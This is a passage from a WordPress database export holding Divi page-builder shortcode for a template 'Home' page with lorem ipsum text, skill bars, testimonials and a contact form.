fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 21:51:21','2020-07-04 21:51:21','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(183,1,'2020-07-04 21:55:18','2020-07-04 21:55:18','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"55px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" hover_enabled=\"0\" box_shadow_style=\"preset2\" 